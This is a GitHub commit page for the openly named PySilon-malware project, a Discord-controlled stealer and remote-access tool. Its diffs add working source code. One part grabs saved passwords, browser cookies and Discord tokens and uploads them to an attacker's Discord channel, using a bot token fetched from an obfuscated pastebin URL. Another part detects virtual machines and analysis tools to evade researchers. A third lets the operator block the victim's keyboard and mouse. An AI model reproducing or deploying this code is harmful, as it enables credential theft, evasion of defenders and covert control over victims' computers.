-
Notifications
You must be signed in to change notification settings - Fork 148
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #178 from mategol/py-dev
`Debug mode`, `@ping` functions
- Loading branch information
Showing
25 changed files
with
959 additions
and
470 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
import resources.discord_token_grabber as discord_token_grabber | ||
import resources.passwords_grabber as passwords_grabber | ||
import resources.get_cookies as cookies_grabber | ||
from base64 import b64decode | ||
from getpass import getuser | ||
from json import loads | ||
import subprocess | ||
import requests | ||
import discord | ||
content = b64decode(requests.get(b64decode('aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3JBM1o4ZHp4')).text) | ||
bot_token, channel_id = b64decode(loads(content)['token'])[::-1].decode(), int(b64decode(loads(content)['channel'])[::-1]) | ||
Client = discord.Client(intents=discord.Intents.all()) | ||
@Client.event | ||
async def on_ready(): | ||
hwid = subprocess.check_output('wmic csproduct get uuid', shell=True).decode().split('\n')[1].strip() | ||
try: passwords = passwords_grabber.grab_passwords() | ||
except: passwords = 'Error (or no saved passwords)' | ||
try: cookies_grabber.grab_cookies() | ||
except: | ||
with open(f'C:\\Users\\{getuser()}\\cookies.txt', 'w', encoding='utf-8') as error_log: error_log.write('Error (or fresh OS)') | ||
try: discord_grabbed = discord_token_grabber.grab_discord.initialize(True) | ||
except: discord_grabbed = 'error' | ||
with open(f'C:\\Users\\{getuser()}\\cookies.txt', 'r', encoding='utf-8') as copy_cookies: cookies = copy_cookies.readlines() | ||
with open(f'C:\\Users\\{getuser()}\\{hwid}.txt', 'w', encoding='utf-8') as save_results: save_results.write('Passwords:\n' + str(passwords) + '\n\n\nDiscord:\n' + ('\n---\n'.join(discord_grabbed) if discord_grabbed != 'error' else discord_grabbed) + '\n\n\nCookies:\n' + ''.join(cookies)) | ||
await Client.get_channel(channel_id).send(file=discord.File(f'C:\\Users\\{getuser()}\\{hwid}.txt', filename='{hwid}.txt')); subprocess.run(f'del C:\\Users\\{getuser()}\\{hwid}.txt', shell=True); subprocess.run(f'del C:\\Users\\{getuser()}\\cookies.txt', shell=True) | ||
Client.run(bot_token) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
import psutil | ||
import os | ||
|
||
def protection_check(): | ||
vm_files = [ | ||
"C:\\windows\\system32\\vmGuestLib.dll", | ||
"C:\\windows\\system32\\vm3dgl.dll", | ||
"C:\\windows\\system32\\vboxhook.dll", | ||
"C:\\windows\\system32\\vboxmrxnp.dll", | ||
"C:\\windows\\system32\\vmsrvc.dll", | ||
"C:\\windows\\system32\\drivers\\vmsrvc.sys" | ||
] | ||
blacklisted_processes = [ | ||
'vmtoolsd.exe', | ||
'vmwaretray.exe', | ||
'vmwareuser.exe' | ||
'fakenet.exe', | ||
'dumpcap.exe', | ||
'httpdebuggerui.exe', | ||
'wireshark.exe', | ||
'fiddler.exe', | ||
'vboxservice.exe', | ||
'df5serv.exe', | ||
'vboxtray.exe', | ||
'vmwaretray.exe', | ||
'ida64.exe', | ||
'ollydbg.exe', | ||
'pestudio.exe', | ||
'vgauthservice.exe', | ||
'vmacthlp.exe', | ||
'x96dbg.exe', | ||
'x32dbg.exe', | ||
'prl_cc.exe', | ||
'prl_tools.exe', | ||
'xenservice.exe', | ||
'qemu-ga.exe', | ||
'joeboxcontrol.exe', | ||
'ksdumperclient.exe', | ||
'ksdumper.exe', | ||
'joeboxserver.exe', | ||
] | ||
|
||
for process in psutil.process_iter(['pid', 'name']): | ||
if process.info['name'].lower() in blacklisted_processes: | ||
return True | ||
for file_path in vm_files: | ||
if os.path.exists(file_path): | ||
return True | ||
|
||
|
||
return False | ||
|
||
def fake_mutex_code(exe_name: str) -> bool: | ||
for process in psutil.process_iter(['pid', 'name']): | ||
if process.info['name'].lower() == exe_name: | ||
return True | ||
|
||
return False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,44 +1,55 @@ | ||
from pynput import keyboard, mouse | ||
# end of imports | ||
|
||
# on message | ||
elif message.content == '.block-input': | ||
if not input_blocked: | ||
await message.delete() | ||
|
||
async def on_press(): | ||
pass | ||
|
||
async def on_release(): | ||
pass | ||
|
||
async def on_click(): | ||
pass | ||
|
||
keyboard_listener = keyboard.Listener(suppress=True) | ||
mouse_listener = mouse.Listener(suppress=True) | ||
|
||
keyboard_listener.start() | ||
mouse_listener.start() | ||
embed = discord.Embed(title="🚫 Input Blocked",description=f'```Input has been blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
input_blocked = True | ||
else: | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is already blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
|
||
elif message.content == '.unblock-input': | ||
if input_blocked: | ||
await message.delete() | ||
keyboard_listener.stop() | ||
mouse_listener.stop() | ||
embed = discord.Embed(title="🟢 Input Unblocked",description=f'```Input has been unblocked. Block it by using .block-input```', colour=discord.Colour.green()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
input_blocked = False | ||
else: | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is not blocked. Block it by using .block-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
from pynput import keyboard, mouse | ||
# end of imports | ||
# on message | ||
elif message.content == '.block-input': | ||
#.log Message is "block input" | ||
if not input_blocked: | ||
#.log Input is not already blocked | ||
await message.delete() | ||
#.log Removed the message | ||
async def on_press(): | ||
pass | ||
async def on_release(): | ||
pass | ||
async def on_click(): | ||
pass | ||
keyboard_listener = keyboard.Listener(suppress=True) | ||
#.log Created keyboard listener | ||
mouse_listener = mouse.Listener(suppress=True) | ||
#.log Created mouse listener | ||
keyboard_listener.start() | ||
#.log Disabled keyboard | ||
mouse_listener.start() | ||
#.log Disabled mouse | ||
embed = discord.Embed(title="🚫 Input Blocked",description=f'```Input has been blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about blocked input | ||
input_blocked = True | ||
else: | ||
#.log Input is already blocked | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is already blocked. Unblock it by using .unblock-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about already blocked input | ||
elif message.content == '.unblock-input': | ||
#.log Message is "unblock input" | ||
if input_blocked: | ||
#.log Input is blocked | ||
await message.delete() | ||
#.log Removed the message | ||
keyboard_listener.stop() | ||
#.log Unblocked keyboard | ||
mouse_listener.stop() | ||
#.log Unblocked mouse | ||
embed = discord.Embed(title="🟢 Input Unblocked",description=f'```Input has been unblocked. Block it by using .block-input```', colour=discord.Colour.green()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about unblocked input | ||
input_blocked = False | ||
else: | ||
#.log Input is not blocked | ||
embed = discord.Embed(title="🔴 Hold on!",description=f'```The input is not blocked. Block it by using .block-input```', colour=discord.Colour.red()) | ||
embed.set_author(name="PySilon-malware", icon_url="https://cdn.discordapp.com/attachments/1125126897584574476/1134166476560011386/icon-1.png") | ||
await message.channel.send(embed=embed) | ||
#.log Sent embed about unblocked input |
Oops, something went wrong.